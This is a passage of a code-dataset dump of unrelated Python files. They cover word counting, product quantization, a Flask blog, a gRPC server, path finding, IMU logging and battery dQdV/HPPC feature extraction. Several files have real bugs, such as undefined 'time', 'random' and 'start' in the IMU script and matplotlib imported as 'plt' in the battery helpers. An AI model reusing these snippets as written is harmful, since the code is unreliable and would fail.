setup_environment()\n","sub_path":"hw5/local_install.py","file_name":"local_install.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648175617","text":"import sys\nimport os\nimport collections\n\n\ndef load_data(filepath):\n try:\n with open(filepath) as text_file:\n readed_text = text_file.read()\n return readed_text\n except IOError:\n return None\n\n\ndef get_most_frequent_words(text):\n word_list = text.split(\" \")\n just_word_list = []\n for word in word_list:\n if word.isalpha():\n just_word_list.append(word)\n counter = collections.Counter(just_word_list)\n number_words = 10\n return counter.most_common(number_words)\n\n\ndef output_words(most_frequent_words):\n for word, number in most_frequent_words:\n print(\" \",\n word,\n \" - повторяется\",\n number,\n \"раз(а)\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n exit(\"Вы не ввели путь к файла с данными\")\n file_path = sys.argv[1]\n if not os.path.isfile(file_path):\n exit(\"Такого файла не существует\")\n if load_data(file_path) is None:\n exit(\"Проблема с открытием файла\")\n\n text = load_data(file_path)\n most_frequent_words = get_most_frequent_words(text)\n output_words(most_frequent_words)\n","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"595542420","text":"import unittest\nimport sys\n\nfrom PyQt4 import QtGui\n\n\nclass Test_test(unittest.TestCase):\n def setUp(self):\n self.app = QtGui.QApplication(sys.argv)\n self.window = QtGui.QMainWindow()\n self.window.show()\n\n def tearDown(self):\n sys.exit(self.app.exec_())\n\n def test_login(self):\n from model.session import Session\n\n Session.authenticate(\"TestUser\", \"hello\")\n player = Session.getPlayer()\n player.setLevel(50)\n self.assertEqual(Session.getPlayer().getLevel(), 50)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python3-qt4/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"174559546","text":"import numpy as np\nfrom scipy.spatial import distance\n\n\ndef pq(data, P, init_centroids, max_iter):\n M = data.shape[1]\n N = data.shape[0]\n K = init_centroids.shape[1]\n newdata = np.array(np.split(data, P, axis=1))\n codebooks = np.zeros(shape=(P, K, M // P), dtype=np.float32)\n # for each split data part\n for part in range(P):\n # update max_iter times for each 
part\n for times in range(max_iter):\n # for each data to calculate the distance to every center,768 data\n # 768 * 256 (every center and its distance to 768 data)\n # for each data, and its distance to 256 k\n newdis = manhattanDistance(newdata[part], init_centroids[part])\n # nearest is 1 * 768,means the nearest center to each data\n nearest = np.argmin(newdis, axis=1)\n\n for k in range(init_centroids[part].shape[0]):\n dimlist = []\n # find all the points belong to certain k and update the median\n for item in np.argwhere(nearest == k):\n # data index is item and its dim\n dimlist.append(newdata[part][item][0])\n if not dimlist:\n continue\n init_centroids[part, k] = np.median(dimlist, axis=0)\n codebooks[part] = init_centroids[part]\n\n # using the newest codebooks and do the k-means, then get the one part of codes\n codes = np.zeros(shape=(N, P), dtype=np.uint8)\n for part in range(P):\n newdis = manhattanDistance(newdata[part], init_centroids[part])\n nearest = np.array(np.argmin(newdis, axis=1), dtype=np.uint8)\n if part == 0:\n # 1 * 768 and transfer it to 768 * 1 then become N*P\n first = nearest.reshape(N, -1)\n else:\n codes = np.concatenate((first, nearest.reshape(N, -1)), axis=1)\n first = codes[:]\n\n return codebooks, codes\n\n\ndef query(queries, codebooks, codes, T):\n qsize = queries.shape[0]\n P = codebooks.shape[0]\n M = queries.shape[1]\n N = codes.shape[0]\n newquery = queries.reshape(qsize, P, M // P) # Q, P,M//P\n candidates = []\n if T >= N:\n for times in range(qsize):\n temp = set()\n for i in range(N):\n temp.add(i)\n candidates.append(temp)\n return candidates\n\n for times in range(qsize):\n # find the distance for each center to the query (P,k) matrix\n # codebooks p,k,m/p\n # newquery[times] , p,m/p\n disarray = np.array([])\n for p in range(codebooks.shape[0]):\n distance = manhattanDistance(newquery[times][p].reshape(1, -1), codebooks[p])\n if p == 0:\n # 1 * 256\n first = distance\n else:\n disarray = np.concatenate((first, distance), axis=0)\n first = disarray[:]\n # 2 * 256, the distance from one data block to all center\n nearindex = np.argsort(disarray, axis=1)\n curset = set()\n heap = []\n direction = generate(P)\n indexstart = [0] * P # for p = 2 ,it is (0,0)\n cursum = 0\n dataindex = []\n for p, v in list(enumerate(indexstart)):\n cursum += disarray[p][nearindex[p][v]]\n dataindex.append(nearindex[p][v])\n heap.append([cursum, dataindex, indexstart])\n indexset = set()\n indexset.add(tuple(indexstart))\n while len(curset) < T:\n firstdata = heap.pop(0)\n first = np.array(firstdata[1])\n indexstart = np.array(firstdata[2])\n indexlist = data_index(codes, first)\n if indexlist.size != 0:\n for item in indexlist:\n curset.add(item)\n # according to the newest element, and add one dimension then push them to heap\n for item in (indexstart + direction):\n cursum = 0\n dataindex = []\n for p, v in enumerate(item):\n cursum += disarray[p][nearindex[p][v]]\n dataindex.append(nearindex[p][v])\n tolist = item.tolist()\n totuple = tuple(tolist)\n if totuple not in indexset:\n # binary insert and do not need to sort again\n insertindex = binary_insert(heap, cursum)\n heap.insert(insertindex, [cursum, dataindex, tolist])\n indexset.add(totuple)\n candidates.append(curset)\n return candidates\n\n\ndef manhattanDistance(data1, data2):\n return distance.cdist(data1, data2, 'cityblock')\n\n\n# indexdata is the data part center,eg,[2,2]means the index of the 0 part is 2,and 1 part is 2\ndef data_index(codesdata, indexdata):\n # res = []\n # for i in 
range(codesdata.shape[0]):\n # if (codesdata[i, :] == indexdata).all():\n # res.append(i)\n # return res\n return np.where(np.logical_and.reduce(codesdata == indexdata, axis=1))[0]\n\n\ndef generate(dim):\n start = 1\n # add one for each dimension\n res = []\n for _ in range(dim):\n temp = list(map(int, bin(start)[2:].zfill(dim)))\n start = start << 1\n res.append(temp)\n return np.array(res)\n\n\n# return the index where to insert\ndef binary_insert(arr, num):\n l = 0\n r = len(arr) - 1\n while l <= r:\n mid = l + (r - l) // 2\n if arr[mid][0] < num:\n l = mid + 1\n else:\n r = mid - 1\n return l\n\n\n\n","sub_path":"9318/proj/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"44868537","text":"\"\"\"\r\n created by Fred on 2018/8/22\r\n\"\"\"\r\nfrom flask_restful import fields\r\nfrom sqlalchemy import Column, Integer, String\r\nfrom app.entity.base import db, Base\r\n\r\n__author__ = 'Fred'\r\n\r\n\r\nclass StatStrategyRecordEntity(Base):\r\n \r\n __tablename__ = 'TB_STAT_STRATEGY_RECORD'\r\n \r\n id = Column(Integer, primary_key=True)\r\n model_id = Column(Integer, nullable=False)\r\n strategy_id = Column(Integer, nullable=False)\r\n batno = Column(String(14), nullable=False)\r\n result = Column(String(1), nullable=False)\r\n score = Column(Integer, nullable=False)\r\n\r\n marshal_fields = {}\r\n marshal_fields['id'] = fields.Integer(attribute='id')\r\n marshal_fields['model_id'] = fields.Integer(attribute='model_id')\r\n marshal_fields['strategy_id'] = fields.Integer(attribute='strategy_id')\r\n marshal_fields['batno'] = fields.String(attribute='batno')\r\n marshal_fields['result'] = fields.String(attribute='result')\r\n marshal_fields['score'] = fields.Integer(attribute='score')\r\n \r\n def __init__(self, v_model_id, v_strategy_id, v_batno, v_result, v_score):\r\n Base.__init__(self)\r\n self.model_id = v_model_id\r\n self.strategy_id = v_strategy_id\r\n self.batno = v_batno\r\n self.result = v_result\r\n self.score = v_score\r\n\r\n def __repr__(self):\r\n return '{\"id\":%r,\"model_id\":%r, \"strategy_id\": %r, \"batno\": %r, \"result\": %r, \"score\": %r}' \\\r\n % (self.id, self.model_id, self.strategy_id, self.batno, self.result, self.score)\r\n\r\n def save(self):\r\n try:\r\n db.session.add(self)\r\n db.session.commit()\r\n except Exception as e:\r\n print(\"Error: \" + str(e))\r\n db.session.rollback()\r\n return False\r\n return True\r\n\r\n def delete(self):\r\n try:\r\n db.session.delete(self)\r\n db.session.commit()\r\n except Exception as e:\r\n print(\"Error: \" + str(e))\r\n db.session.rollback()\r\n return False\r\n return True\r\n\r\n def get(self):\r\n try:\r\n return db.session.get(self.id)\r\n except Exception as e:\r\n print(\"Error: \" + str(e))\r\n return None\r\n","sub_path":"pyaiservice/app/entity/statstrategyqueryrecordentity.py","file_name":"statstrategyqueryrecordentity.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"433808006","text":"# 1432. 
Max Difference You Can Get From Changing an Integer\n# vbc 25\n# 2021/12/10\n\n# Runtime: 16 ms, faster than 100.00% of Python3 online submissions for Max Difference You Can Get From Changing an Integer.\n# Memory Usage: 14.3 MB, less than 14.29% of Python3 online submissions for Max Difference You Can Get From Changing an Integer.\n\n# greedy\n# diff = amx - diff\n# in order to make the diff as big as possible, we need make the max as big as possible and min as small as possible\n# max: iterate the list from the beginning, find the first digit that is not 9, and replace it as well as all\n# occurrence by 9\n# min: we have two situations. if the first digit is not 1, replace it as well as all occurrence by 1; otherwise,\n# search the first digit that is neither 0 or 1, and replace it as well as all occurrences by 0\n\n# remarks: brute force method is interesting; string replace function is good\n\nclass Solution:\n def maxDiff(self, num: int) -> int:\n max_digits = list(str(num))\n i = 0\n while i < len(max_digits) and max_digits[i] == '9':\n i += 1\n if i < len(max_digits):\n key = max_digits[i]\n while i < len(max_digits):\n if max_digits[i] == key:\n max_digits[i] = '9'\n i += 1\n min_digits = list(str(num))\n if min_digits[0] != '1':\n i, key = 0, min_digits[0]\n else:\n i = 1\n while i < len(min_digits) and (min_digits[i] == '0' or min_digits[i] == '1'):\n i += 1\n if i < len(min_digits):\n key = min_digits[i]\n val = '0' if i > 0 else '1'\n while i < len(min_digits):\n if min_digits[i] == key:\n min_digits[i] = val\n i += 1\n return int(\"\".join(max_digits)) - int(\"\".join(min_digits))\n","sub_path":"1432. Max Difference You Can Get From Changing an Integer.py","file_name":"1432. Max Difference You Can Get From Changing an Integer.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347445131","text":"command = input()\n\nnumbers = [int(el) for el in input().split()]\n\nif command == \"Odd\":\n odd = [el for el in numbers if el % 2 == 1]\n res = sum(odd) * len(numbers)\n print(res)\nelif command == \"Even\":\n even = [el for el in numbers if el % 2 == 0]\n res = sum(even) * len(numbers)\n print(res)","sub_path":"advanced/advanced functions/even vs odd.py","file_name":"even vs odd.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528667939","text":"''' test_raw_data.py - Use this program to connect to any imu on file and output raw data.\n\n'''\n\nfrom imu_framework.tests.context import imu_tools\nfrom imu_framework.tests.context import imu_base\nfrom matplotlib import pyplot as plt\nfrom imu_framework.tests.context import RealtimePlot\n\n\n# from imu_framework.tests.context import imu_no_thrd_9250\n# from imu_framework.tests.context import imu_thrd_9250\n\n# from imu_framework.tests.context import imu_no_thrd_9250\n# from imu_framework.tests.context import imu_thrd_9250\n\n# from imu_framework.tests.context import imu_no_thrd_sparton\n# from imu_framework.tests.context import imu_thrd_sparton\n\nif __name__ == '__main__':\n\n ######## instantiate IMUs ####################################\n # myIMU_no_thrd_9250 = imu_no_thrd_9250()\n # myIMU_thrd_9250 = imu_thrd_9250()\n\n # myIMU_no_thrd_sparton = imu_no_thrd_sparton()\n # myIMU_thrd_sparton = imu_thrd_sparton()\n\n myIMU_base = imu_base()\n\n\n ######## connect all IMUs #############################################\n # 
myIMU_no_thrd_9250.connect()\n # myIMU_thrd_9250.connect()\n\n # myIMU_no_thrd_sparton.connect()\n # myIMU_thrd_sparton.connect()\n\n myIMU_base.connect()\n\n # fix me take all and put into tools so multipal instantiations are can be achived\n ##########################################################################\n myTools = imu_tools(imu=myIMU_base)\n\n fig, axes = plt.subplots()\n display = RealtimePlot(axes)\n\n i = 0\n print('start')\n while i <= 4999:\n\n rawAccel = myTools.get_raw_scale_data()\n\n # print(i)\n print(rawAccel)\n # myTools.dataForMatlabProcesing(rawAccel, i, 'LoggedData_CalInertialAndMag')\n\n # tcAcceleration = myTools.get_arhs_tcAccel()\n # print(tcAcceleration)\n\n # zVector = myTools.get_arhs_z_vector()\n # print(zVector)\n i = i + 1\n\n ######## disconnect all IMUs #############################################\n\n # myIMU_no_thrd_sparton.disconnect()\n print(i)\n\n\n display.animate(fig, lambda frame_index: (time.time() - start, random.random() * 100))\n plt.show()\n\n fig, axes = plt.subplots()\n display = RealtimePlot(axes)\n while True:\n display.add(time.time() - start, 100)\n plt.pause(0.001)","sub_path":"imu_framework/tests/test_raw_data.py","file_name":"test_raw_data.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593865898","text":"import cv2\nimport time\nfrom datetime import timedelta\nimport position\nimport settings\nimport a_star\nimport best_first\n\n\n# Draws the given path on the image and shows it\ndef write_path(path):\n\n while len(path) > 0:\n node = path.pop()\n x = node.position.x\n y = node.position.y\n\n settings.image[x, y] = [255, 255, 255]\n\n cv2.imshow(\"Path\", settings.image)\n cv2.waitKey(0)\n\n\n# Manage all program\ndef main():\n\n image_name = input(\"\\n> Write image name : \") # Take image path from user\n settings.image = cv2.imread(image_name) # Read the image\n if settings.image is None: # Control if image was found\n print(\" Image not found \")\n return -1\n\n print(\"\\n> Select the algorithm you want to use\")\n selection = input(\" 1) A* with heap\\n 2) A* with stack\\n 3) BestFirst with heap\\n 4) BestFirst with stack\\n >\")\n\n # Define coordinate of start and end node\n print(\"\\n Image size is (\", settings.image.shape[0]-1, \", \", settings.image.shape[1]-1, \")\")\n x = int(input(\"> Enter the x coordinates of starting position : \"))\n y = int(input(\"> Enter the y coordinates of starting position : \"))\n start = position.Position(x, y)\n x = int(input(\"> Enter the x coordinates of ending position : \"))\n y = int(input(\"> Enter the y coordinates of ending position : \"))\n end = position.Position(x, y)\n\n star = time.time()\n if selection == \"1\":\n path, count_max, count_pop = a_star.a_star_with_heap(start, end) # Find the optimum path with A* using heap\n elif selection == \"2\":\n path, count_max, count_pop = a_star.a_star_with_stack(start, end) # Find the optimum path with A* using stack\n elif selection == \"3\":\n path, count_max, count_pop = best_first.bfs_with_heap(start, end) # Find the path with Best First using heap\n elif selection == \"4\":\n path, count_max, count_pop = best_first.bfs_with_stack(start, end) # Find the path with Best First using stack\n else:\n print(\" Invalid Selection \")\n path, count_max, count_pop = None, None, None\n elapsed = (time.time() - star)\n\n if path is None:\n print(\" ERROR: Path not found or start/end coordinates not given correctly\")\n else:\n 
print(\"\\nExecution took: %s secs\" % timedelta(seconds=round(elapsed)))\n print(\"Maximum number of heap/stack elements : \", count_max)\n print(\"Number of pop() called : \", count_pop)\n print(\" > Image printed on your screen! \")\n write_path(path) # draw the path on the image and show it\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"artificial-intelligence-basic/path-finding-with-Astar/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98132044","text":"from blog.users.pic_handler import add_profile_pic\nimport secrets\nimport os\nfrom flask import Blueprint, render_template, request, url_for, redirect, flash, current_app\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom blog import db\nfrom blog.models import User, Post\nfrom blog.users.forms import Reg_form, Login_form, Update_User_form\nusers = Blueprint('users',__name__)\n\n#register\n@users.route('/reg', methods=['post','get'])\ndef register():\n form = Reg_form()\n if form.validate_on_submit():\n new_user = User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n db.session.add(new_user)\n db.session.commit()\n flash('Regisration success')\n return redirect(url_for(request.args.get('next','users.login')))\n return render_template('reg.html',form=form)\n#login_view\n@users.route('/login', methods=['post','get'])\ndef login():\n form = Login_form()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user is not None and user.check_password(form.password.data):\n login_user(user)\n flash('Login success')\n return redirect(url_for(request.args.get('next','core.index')))\n else:\n flash('Invalid username or password', 'error')\n return render_template('login.html', form=form)\n\n#login_out\n@login_required\n@users.route(('/logout'))\ndef logout():\n logout_user()\n flash('Logout success')\n return redirect(url_for('core.index'))\n\n\n@login_required\n@users.route('/acc', methods=['GET', 'POST'])\ndef acc():\n form = Update_User_form()\n if form.validate_on_submit():\n if form.picture.data:\n # picture_file = save_picture(form.picture.data)\n picture_file = add_profile_pic(form.picture.data, form.username.data)\n current_user.profile_image = picture_file\n current_user.username=form.username.data\n current_user.email=form.email.data\n db.session.commit()\n flash('Account updated', 'success')\n return redirect(url_for('users.acc'))\n elif request.method == 'GET': #must be cap\n form.username.data = current_user.username\n form.email.data = current_user.email\n profile_image = url_for('static', filename='profile_img/'+current_user.profile_image)\n return render_template('acc.html', profile_image=profile_image, check=current_user.profile_image, form = form)\n\n@login_required\n@users.route('/<int:user_id>')\ndef user_posts(user_id):\n user = User.query.get_or_404(user_id)\n posts_by_users = Post.query.filter_by(author=user).order_by(Post.date.desc())\n # return render_template('user_page.html', posts_by_users=posts_by_users)\n return render_template('user_page.html', user=user, posts_by_users=posts_by_users)\n # try two\n","sub_path":"build_along/blog-project/blog/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"216448413","text":"from concurrent import 
futures\nimport time\nimport grpc\nfrom rpc.protoc import regular_adjustment_pb2_grpc\nfrom rpc.protoc import conditional_trigger_pb2_grpc\nfrom rpc.protoc import adjustment_and_triggering_of_portfolio_pb2_grpc\nfrom rpc.protoc import stocks_pb2_grpc\nfrom rpc.protoc import option_futures_pb2_grpc\nfrom rpc.protoc import citibank_api_pb2_grpc\nfrom rpc import RegularAdjustmentService, ConditionalTriggerService, AdjustmentAndTriggeringOfPortfolioService, \\\n StocksService, OptionFuturesService, CitibankApiService\n\n_ONE_DAY_IN_SECONDS = 60 * 60 * 24\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n regular_adjustment_pb2_grpc.add_RegularAdjustmentServicer_to_server(\n RegularAdjustmentService.RegularAdjustmentService(), server)\n conditional_trigger_pb2_grpc.add_ConditionalTriggerServicer_to_server(\n ConditionalTriggerService.ConditionalTriggerService(), server)\n adjustment_and_triggering_of_portfolio_pb2_grpc.add_AdjustmentAndTriggeringOfPortfolioServicer_to_server(\n AdjustmentAndTriggeringOfPortfolioService.AdjustmentAndTriggeringOfPortfolioService(), server)\n stocks_pb2_grpc.add_StocksServicer_to_server(\n StocksService.StocksService(), server)\n option_futures_pb2_grpc.add_OptionFuturesServicer_to_server(\n OptionFuturesService.OptionFuturesService(), server)\n citibank_api_pb2_grpc.add_CitibankApiServicer_to_server(\n CitibankApiService.CitibankApiService(), server\n )\n\n server.add_insecure_port('[::]:50051')\n server.start()\n try:\n while True:\n time.sleep(_ONE_DAY_IN_SECONDS)\n except KeyboardInterrupt:\n server.stop(0)\n\n\nif __name__ == '__main__':\n serve()\n","sub_path":"RpcServer.py","file_name":"RpcServer.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401776054","text":"#!/usr/bin/env python3\n# Copyright (c) 2019 Toyota Research Institute\n\n\"\"\"\nHelper functions for generating features in beep.featurize module\nAll methods are currently lumped into this script.\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib as plt\nfrom scipy import signal\nfrom lmfit import models\nfrom scipy.interpolate import interp1d\n\n\ndef isolate_dQdV_peaks(processed_cycler_run, diag_nr, charge_y_n, max_nr_peaks, rpt_type, half_peak_width=0.075):\n \"\"\"\n Determine the number of cycles to reach a certain level of degradation\n\n Args:\n processed_cycler_run: processed_cycler_run (beep.structure.ProcessedCyclerRun): information about cycler run\n rpt_type: string indicating which rpt to pick\n charge_y_n: if 1 (default), takes charge dQdV, if 0, takes discharge dQdV\n diag_nr: if 1 (default), takes dQdV of 1st RPT past the initial diagnostic\n\n Returns:\n dataframe with Voltage and dQdV columns for charge or discharge curve in the rpt_type diagnostic cycle.\n The peaks will be isolated\n \"\"\"\n\n rpt_type_data = processed_cycler_run.diagnostic_interpolated[(processed_cycler_run.diagnostic_interpolated.cycle_type == rpt_type)]\n cycles = rpt_type_data.cycle_index.unique()\n\n ## Take charge or discharge from cycle 'diag_nr'\n data = pd.DataFrame({'dQdV': [], 'voltage': []})\n\n if charge_y_n == 1:\n data.dQdV = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 0)].charge_dQdV.values\n data.voltage = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 0)].voltage.values\n elif charge_y_n == 0:\n data.dQdV = rpt_type_data[\n 
(rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 1)].discharge_dQdV.values\n data.voltage = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 1)].voltage.values\n # Turn values to positive temporarily\n data.dQdV = -data.dQdV\n else:\n raise NotImplementedError('Charge_y_n must be either 0 or 1')\n\n # Remove NaN from x and y\n data = data.dropna()\n\n # Reset x and y to values without NaNs\n x = data.voltage\n y = data.dQdV\n\n # Remove strong outliers\n upper_limit = y.sort_values().tail(round(0.01 * len(y))).mean() + y.sort_values().mean()\n data = data[(y < upper_limit)]\n\n # Reset x and y to values without outliers\n x = data.voltage\n y = data.dQdV\n\n # Filter out the x values of the peaks only\n no_filter_data = data\n\n # Find peaks\n peak_indices = signal.find_peaks_cwt(y, (10,))[-max_nr_peaks:]\n\n peak_voltages = {}\n peak_dQdVs = {}\n\n for count, i in enumerate(peak_indices):\n temp_filter_data = no_filter_data[((x > x.iloc[i] - half_peak_width) & (x < x.iloc[i] + half_peak_width))]\n peak_voltages[count] = x.iloc[i]\n peak_dQdVs[count] = y.iloc[i]\n\n if count == 0:\n filter_data = temp_filter_data\n else:\n filter_data = filter_data.append(temp_filter_data)\n\n return filter_data, no_filter_data, peak_voltages, peak_dQdVs\n\n\ndef generate_model(spec):\n \"\"\"\n Method that generates a model to fit the hppc data to for peak extraction, using spec dictionary\n :param spec (dict): dictionary containing X, y model types.\n :return: composite model objects of lmfit Model class and a parameter object as defined in lmfit.\n \"\"\"\n composite_model = None\n params = None\n x = spec['x']\n y = spec['y']\n x_min = np.min(x)\n x_max = np.max(x)\n x_range = x_max - x_min\n y_max = np.max(y)\n for i, basis_func in enumerate(spec['model']):\n prefix = f'm{i}_'\n\n #models is an lmfit object\n model = getattr(models, basis_func['type'])(prefix=prefix)\n if basis_func['type'] in ['GaussianModel', 'LorentzianModel',\n 'VoigtModel']: # for now VoigtModel has gamma constrained to sigma\n model.set_param_hint('sigma', min=1e-6, max=x_range)\n model.set_param_hint('center', min=x_min, max=x_max)\n model.set_param_hint('height', min=1e-6, max=1.1 * y_max)\n model.set_param_hint('amplitude', min=1e-6)\n\n default_params = {\n prefix + 'center': x_min + x_range * np.random.randn(),\n prefix + 'height': y_max * np.random.randn(),\n prefix + 'sigma': x_range * np.random.randn()\n }\n else:\n raise NotImplemented(f'model {basis_func[\"type\"]} not implemented yet')\n if 'help' in basis_func: # allow override of settings in parameter\n for param, options in basis_func['help'].items():\n model.set_param_hint(param, **options)\n model_params = model.make_params(**default_params, **basis_func.get('params', {}))\n if params is None:\n params = model_params\n else:\n params.update(model_params)\n if composite_model is None:\n composite_model = model\n else:\n composite_model = composite_model + model\n return composite_model, params\n\n\ndef update_spec_from_peaks(spec, model_indices, peak_voltages, peak_dQdVs, peak_widths=(10,), **kwargs):\n x = spec['x']\n y = spec['y']\n x_range = np.max(x) - np.min(x)\n\n for i, j, model_index in zip(peak_voltages, peak_dQdVs, model_indices):\n model = spec['model'][model_index]\n\n if model['type'] in ['GaussianModel', 'LorentzianModel', 'VoigtModel']:\n params = {\n 'height': peak_dQdVs[j],\n 'sigma': x_range / len(x) * np.min(peak_widths),\n 'center': peak_voltages[i]\n }\n if 'params' in 
model:\n model.update(params)\n else:\n model['params'] = params\n else:\n raise NotImplemented(f'model {basis_func[\"type\"]} not implemented yet')\n return\n\n\ndef generate_dQdV_peak_fits(processed_cycler_run, rpt_type, diag_nr, charge_y_n, plotting_y_n=0, max_nr_peaks=4):\n \"\"\"\n Generate fits characteristics from dQdV peaks\n\n Args:\n processed_cycler_run: processed_cycler_run (beep.structure.ProcessedCyclerRun)\n diag_nr: if 1, takes dQdV of 1st RPT past the initial diagnostic, 0 (default) is initial dianostic\n charge_y_n: if 1 (default), takes charge dQdV, if 0, takes discharge dQdV\n\n\n Returns:\n dataframe with Amplitude, mu and sigma of fitted peaks\n \"\"\"\n # Uses isolate_dQdV_peaks function to filter out peaks and returns x(Volt) and y(dQdV) values from peaks\n\n data, no_filter_data, peak_voltages, peak_dQdVs = isolate_dQdV_peaks(processed_cycler_run, rpt_type=rpt_type, \\\n charge_y_n=charge_y_n, diag_nr=diag_nr,\n max_nr_peaks=max_nr_peaks,\n half_peak_width=0.07)\n\n no_filter_x = no_filter_data.voltage\n no_filter_y = no_filter_data.dQdV\n\n ####### Setting spec for gaussian model generation\n\n x = data.voltage\n y = data.dQdV\n\n # Set construct spec using number of peaks\n model_types = []\n for i in np.arange(max_nr_peaks):\n model_types.append({'type': 'GaussianModel', 'help': {'sigma': {'max': 0.1}}})\n\n spec = {\n 'x': x,\n 'y': y,\n 'model': model_types\n }\n\n # Update spec using the found peaks\n update_spec_from_peaks(spec, np.arange(max_nr_peaks), peak_voltages, peak_dQdVs)\n if plotting_y_n:\n fig, ax = plt.subplots()\n ax.scatter(spec['x'], spec['y'], s=4)\n for i in peak_voltages:\n ax.axvline(x=peak_voltages[i], c='black', linestyle='dotted')\n ax.scatter(peak_voltages[i], peak_dQdVs[i], s=30, c='red')\n\n #### Generate fitting model\n\n model, params = generate_model(spec)\n output = model.fit(spec['y'], params, x=spec['x'])\n if plotting_y_n:\n # #Plot residuals\n # fig, gridspec = output.plot(data_kws={'markersize': 1})\n\n ### Plot components\n\n ax.scatter(no_filter_x, no_filter_y, s=4)\n ax.set_xlabel('Voltage')\n\n if charge_y_n:\n ax.set_title(f'dQdV for charge diag cycle {diag_nr}')\n ax.set_ylabel('dQdV')\n else:\n ax.set_title(f'dQdV for discharge diag cycle {diag_nr}')\n ax.set_ylabel('- dQdV')\n\n components = output.eval_components()\n for i, model in enumerate(spec['model']):\n ax.plot(spec['x'], components[f'm{i}_'])\n\n # Construct dictionary of peak fits\n peak_fit_dict = {}\n for i, model in enumerate(spec['model']):\n best_values = output.best_values\n prefix = f'm{i}_'\n peak_fit_dict[prefix + \"Amp\"] = [peak_dQdVs[i]]\n peak_fit_dict[prefix + \"Mu\"] = [best_values[prefix + \"center\"]]\n peak_fit_dict[prefix + \"Sig\"] = [best_values[prefix + \"sigma\"]]\n\n # Make dataframe out of dict\n peak_fit_df = pd.DataFrame(peak_fit_dict)\n\n return peak_fit_df\n\n\n\ndef interp(df):\n '''\n this function takes in a data frame that we are interested in, and\n returns an interpolation function based on the discharge volatge and capacity\n '''\n V = df.voltage.values\n Q = df.discharge_capacity.values\n f = interp1d(Q, V, kind='cubic', fill_value=\"extrapolate\")\n return f\n\n\ndef list_minus(list1, list2):\n \"\"\"\n this function takes in two lists and will return a list containing\n the values of list1 minus list2\n \"\"\"\n result = []\n zip_object = zip(list1, list2)\n for list1_i, list2_i in zip_object:\n result.append(list1_i - list2_i)\n return result\n\n\ndef get_hppc_ocv_helper(cycle_hppc_0, step_num):\n \"\"\"\n this helper 
function takes in a cycle and a step number\n and returns a list that stores the mean of the last five points of voltage in different\n step counter indexes (which is basically the soc window)\n \"\"\"\n chosen1 = cycle_hppc_0[cycle_hppc_0.step_index == step_num]\n voltage1 = []\n step_index_counters = chosen1.step_index_counter.unique()[0:9]\n for i in range(len(step_index_counters)):\n df_i = chosen1.loc[chosen1.step_index_counter == step_index_counters[i]]\n voltage1.append(df_i['voltage'].iloc[-10].mean()) # take the mean of the last 10 points of the voltage value\n return voltage1\n\n\ndef get_hppc_ocv(processed_cycler_run, diag_num):\n '''\n This function takes in cycling data for one cell and returns the variance of OCVs at different SOCs\n diag_num cyce minus first hppc cycle(cycle 2)\n Argument:\n processed_cycler_run(process_cycler_run object)\n diag_num(int): diagnostic cycle number at which you want to get the feature, such as 37 or 142\n Returns:\n a float\n the variance of the diag_num minus cycle 2 for OCV\n '''\n data = processed_cycler_run.diagnostic_interpolated\n cycle_hppc = data.loc[data.cycle_type == 'hppc']\n cycle_hppc = cycle_hppc.loc[cycle_hppc.current.notna()]\n step = 11\n step_later = 43\n cycle_hppc_0 = cycle_hppc.loc[cycle_hppc.cycle_index == 2]\n # in case that cycle 2 correspond to two cycles one is real cycle 2, one is at the end\n cycle_hppc_0 = cycle_hppc_0.loc[cycle_hppc_0.test_time < 250000]\n voltage_1 = get_hppc_ocv_helper(cycle_hppc_0, step)\n chosen = cycle_hppc.loc[cycle_hppc.cycle_index == diag_num]\n voltage_2 = get_hppc_ocv_helper(chosen, step_later)\n dv = list_minus(voltage_1, voltage_2)\n return np.var(dv)\n\n\ndef get_hppc_r(processed_cycler_run, diag_num):\n '''\n This function takes in cycling data for one cell and returns the resistance at different SOCs with resistance at the\n first hppc cycle(cycle 2) deducted\n Argument:\n processed_cycler_run(process_cycler_run object)\n diag_num(int): diagnostic 